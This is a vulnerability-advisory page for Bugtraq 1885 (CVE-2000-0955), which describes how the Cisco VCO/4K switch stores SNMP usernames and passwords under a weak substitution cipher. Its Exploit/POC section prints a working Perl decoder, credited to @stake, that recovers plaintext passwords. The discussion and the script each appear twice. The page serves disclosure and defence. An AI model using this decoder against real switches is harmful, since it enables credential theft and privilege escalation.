Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
BID:1885
Info
Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
| Bugtraq ID: | 1885 |
| Class: | Access Validation Error |
| CVE: |
CVE-2000-0955 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 26 2000 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | Reported to bugtraq by "@stake Advisories" <[email protected]> on Thu, 26 Oct 2000. |
| Vulnerable: |
Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 |
| Not Vulnerable: |
Cisco Virtual Central Office 4000 (VCO/4K) 5.1.4 |
Discussion
Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier.
The usernames and passwords for the device's SNMP administration interface are protected by a simple substitution cipher which can be easily defeated. As a result, if the "encrypted" passwords are retrieved, (for example, through the read-only community string) an attacker can obtain a list of valid usernames and passwords potentially allowing an elevation of privileges and possibly more serious consequences.
A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier.
The usernames and passwords for the device's SNMP administration interface are protected by a simple substitution cipher which can be easily defeated. As a result, if the "encrypted" passwords are retrieved, (for example, through the read-only community string) an attacker can obtain a list of valid usernames and passwords potentially allowing an elevation of privileges and possibly more serious consequences.
Exploit / POC
Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
<--- cut here --->
#!/usr/bin/perl
printf ("Cisco VCO/4K Password [De]Obfuscator\n");
printf ("\t\@stake, Inc.\n");
printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");
printf ("Enter Password: ");
$pw = <STDIN>;
chop $pw;
printf("Result: ");
for ($pos = 0; $pos < length($pw); $pos++){
printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
}
printf("\n");
<--- cut here --->
<--- cut here --->
#!/usr/bin/perl
printf ("Cisco VCO/4K Password [De]Obfuscator\n");
printf ("\t\@stake, Inc.\n");
printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");
printf ("Enter Password: ");
$pw = <STDIN>;
chop $pw;
printf("Result: ");
for ($pos = 0; $pos < length($pw); $pos++){
printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
}
printf("\n");
<--- cut here --->